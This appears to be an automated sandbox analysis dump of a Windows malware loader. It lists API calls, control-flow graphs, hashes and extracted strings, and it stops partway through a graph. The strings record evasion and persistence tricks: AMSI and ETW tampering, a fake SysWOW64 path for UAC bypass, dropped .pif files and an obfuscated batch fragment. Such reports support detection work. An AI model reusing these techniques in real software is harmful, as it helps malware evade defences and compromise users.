                                                                                          • Part of subcall function 027EDF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                          • Part of subcall function 027EDF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                          • Part of subcall function 027E8204: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027E828E), ref: 027E8270
                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,Initialize,0282B37C,027FB9D4,00000000,00000000,00000000,ScanString,0282B37C,027FB9D4), ref: 027FB4A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                        • API String ID: 2481178504-1225450241
                                                                                        • Opcode ID: 7899f309d0e2291e6f40dfa57cec160f1b906506c975b4133385b8badc5260e0
                                                                                        • Instruction ID: b4c5f7aba5514e3f01f023416b61cda6f43868a553a26921e9affe6cc03fbf0d
                                                                                        • Opcode Fuzzy Hash: 7899f309d0e2291e6f40dfa57cec160f1b906506c975b4133385b8badc5260e0
                                                                                        • Instruction Fuzzy Hash: 5F433B79A1415D8BCF22EB65DC959DEB3B6EF8C300F1440E6A50AAB310DB30AE95CF51

                                                                                        Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed). Function at 27f4134; Win32 API calls reached in the graph: Sleep.
call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8636->8783 8784 27f84e8-27f86e7 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8636->8784 8637->8636 8654 27f5f9b-27f66a5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 * 2 call 27d4764 8637->8654 9316 27f66aa-27f66b1 call 27edf80 8654->9316 9549 27f800d-27f8010 8783->9549 9550 27f8012-27f82d4 call 27e5aec call 27d4bcc call 
27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49f8 call 27e7e50 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27eafd0 8783->9550 8959 27f86ed-27f88c0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d47ec call 27d49a0 call 27d4d74 call 27d4df0 CreateProcessAsUserW 8784->8959 8960 27f9571-27f96f4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8784->8960 9171 27f893e-27f8a49 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8959->9171 9172 27f88c2-27f8939 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8959->9172 9140 27f96fa-27f9709 call 27d48ec 8960->9140 9141 27f9ea0-27f9f0b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 8960->9141 9140->9141 9157 27f970f-27f99e2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 
27ef388 call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7e5c 9140->9157 9205 27f9f10-27f9f17 call 27e889c 9141->9205 9578 27f9c9a-27f9d05 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9157->9578 9579 27f99e8-27f9c89 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 * 2 call 27d4764 9157->9579 9328 27f8a4b-27f8a4e 9171->9328 9329 27f8a50-27f8d70 call 27d49f8 call 27ee144 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ed01c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 9171->9329 9172->9171 9218 27f9f1c-27fa036 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 9205->9218 9385 27fa03b-27fa042 call 27e889c 9218->9385 9326 27f66b6-27f6721 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9316->9326 9387 27f6726-27f672d call 
27e889c 9326->9387 9328->9329 9863 27f8d89-27f9490 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c ResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c CloseHandle call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7f4c call 27e8818 * 6 CloseHandle 9329->9863 9864 27f8d72-27f8d84 call 27e85fc 9329->9864 9395 27fa047-27fa069 call 27d46d4 * 2 9385->9395 9397 27f6732-27f68b5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 9387->9397 9417 27fa06e-27fa075 call 27e889c 9395->9417 9632 27f68bb-27f6b08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 
call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d4d74 call 27d4de0 call 27d4764 9397->9632 9633 27f6b19-27f6b84 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9397->9633 9428 27fa07a-27fa09c call 27d46d4 * 2 9417->9428 9444 27fa0a1-27fa0a8 call 27e889c 9428->9444 9454 27fa0ad-27fa0cf call 27d46d4 * 2 9444->9454 9475 27fa0d4-27fa0db call 27e889c 9454->9475 9486 27fa0e0-27fa14b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9475->9486 9545 27fa150-27fa157 call 27e889c 9486->9545 9556 27fa15c-27fa276 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 9545->9556 9549->9550 10099 27f82d9-27f82f0 call 27d3700 9550->10099 9762 27fa27b-27fa282 call 27e889c 9556->9762 9652 27f9d0a-27f9d11 call 27e889c 9578->9652 10086 27f9c8e-27f9c95 call 27edf80 9579->10086 10079 27f6b0d-27f6b14 call 27edf80 9632->10079 9716 27f6b89-27f6b90 call 27e889c 9633->9716 9667 27f9d16-27f9e8f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49f8 9652->9667 9974 27f9e94-27f9e9b call 27e8c28 9667->9974 9730 27f6b95-27f7210 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 
27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d36d0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d2f08 call 27d7990 call 27d47ec call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2f08 call 27d7990 call 27d47ec call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 9716->9730 10482 27f7215-27f7222 call 27e4dd4 9730->10482 9777 27fa287-27fa2a9 call 27d46d4 * 2 9762->9777 9807 27fa2ae-27fa2b5 call 27e889c 9777->9807 9816 27fa2ba-27fa2dc call 27d46d4 * 2 9807->9816 9844 27fa2e1-27fa2e8 call 27e889c 9816->9844 9859 27fa2ed-27fa30f call 27d46d4 * 2 9844->9859 9891 27fa314-27fa31b call 27e889c 9859->9891 10550 27f9495-27f956c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 9863->10550 9864->9863 9906 27fa320-27fa342 call 27d46d4 * 2 9891->9906 9930 27fa347-27fa34e call 27e889c 9906->9930 9944 27fa353-27fa3be call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9930->9944 10027 27fa3c3-27fa3ca call 27e889c 9944->10027 9974->9141 10034 27fa3cf-27fa614 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 
10027->10034 10264 27fa619-27fa620 call 27e889c 10034->10264 10079->9633 10086->9578 10270 27fa625-27fa647 call 27d46d4 * 2 10264->10270 10283 27fa64c-27fa653 call 27e889c 10270->10283 10289 27fa658-27fa67a call 27d46d4 * 2 10283->10289 10301 27fa67f-27fa686 call 27e889c 10289->10301 10305 27fa68b-27fa6ad call 27d46d4 * 2 10301->10305 10317 27fa6b2-27fa6b9 call 27e889c 10305->10317 10323 27fa6be-27fab58 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c * 5 10317->10323 10628 27fab5d-27fabb2 call 27e889c * 6 10323->10628 10487 27f7225-27f723c call 27d3700 10482->10487 10550->8960 10640 27fabb7-27fabc1 call 27e889c 10628->10640 10642 27fabc6-27fabee call 27e889c * 3 10640->10642 10648 27fabf3-27faf79 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 
27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 10642->10648 10752 27faf7e-27faf85 call 27e889c 10648->10752 10754 27faf8a-27fafac call 27d46d4 * 2 10752->10754 10758 27fafb1-27fafb8 call 27e889c 10754->10758 10760 27fafbd-27fafdf call 27d46d4 * 2 10758->10760 10764 27fafe4-27fafeb call 27e889c 10760->10764 10766 27faff0-27fb012 call 27d46d4 * 2 10764->10766 10770 27fb017-27fb01e call 27e889c 10766->10770 10772 27fb023-27fb045 call 27d46d4 * 2 10770->10772 10776 27fb04a-27fb051 call 27e889c 10772->10776 10778 27fb056-27fb49e call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27d46d4 * 2 call 27e889c call 27e7c10 call 27e8204 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 10776->10778 10908 27fb4a3-27fb4a5 ExitProcess 10778->10908
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,027FBD74), ref: 027F549F
                                                                                          • Part of subcall function 027EDEF8: Rt.N(?,?,00000000,027EDF72), ref: 027EDF20
                                                                                          • Part of subcall function 027EDEF8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF36
                                                                                          • Part of subcall function 027EDEF8: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,027EDF72), ref: 027EDF55
                                                                                        • Sleep.KERNEL32(000007D0,ScanBuffer,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4), ref: 027F458A
                                                                                          • Part of subcall function 027EDF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                          • Part of subcall function 027EDF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
                                                                                          • Part of subcall function 027EDF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                          • Part of subcall function 027EDF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                          • Part of subcall function 027E8784: LoadLibraryW.KERNEL32(amsi), ref: 027E878D
                                                                                          • Part of subcall function 027E8784: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027E87EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$FilePath$FreeLoad$AddressNameName_ProcSleep$AttributesCloseCreateDeleteHandleModuleWrite
                                                                                        • String ID: .url$@echo off@%.%e%%c% %h% %o%.oo.% %.%o%$C:\Users\Public\$C:\Users\Public\alpha.pif$C:\Users\Public\xkn.pif$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.pif$FX.c$HotKey=$IconIndex=$Initialize$NEO.c$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                        • API String ID: 3260000616-127592166
                                                                                        • Opcode ID: cdb8d9ae3799dcb8fbd723b4d8fa793081b16cbc478ca56db1a113b70fe8c2df
                                                                                        • Instruction ID: 168ab9fc6185536955297ed84cedf4d88a4970db049c131dc4aa1071cfba4ec2
                                                                                        • Opcode Fuzzy Hash: cdb8d9ae3799dcb8fbd723b4d8fa793081b16cbc478ca56db1a113b70fe8c2df
                                                                                        • Instruction Fuzzy Hash: 73437839B1425D8FDF62EB65DC95A9AB3B6FF89304F1040E29549AB350CB30AE95CF01

                                                                                        Control-flow Graph
                                                                                        control_flow_graph 10935 27ee96c-27ee970 10936 27ee975-27ee97a 10935->10936 10936->10936 10937 27ee97c-27eef75 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4740 * 2 call 27d4860 call 27d4778 call 27d30d4 call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4740 call 27d7f2c call 27d49a0 call 27d4d74 call 27d4df0 call 27d4740 call 27d49a0 call 27d4d74 call 27d4df0 call 27e8654 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 10936->10937 11140 27eef7b-27ef1d1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c WaitForSingleObject CloseHandle * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 
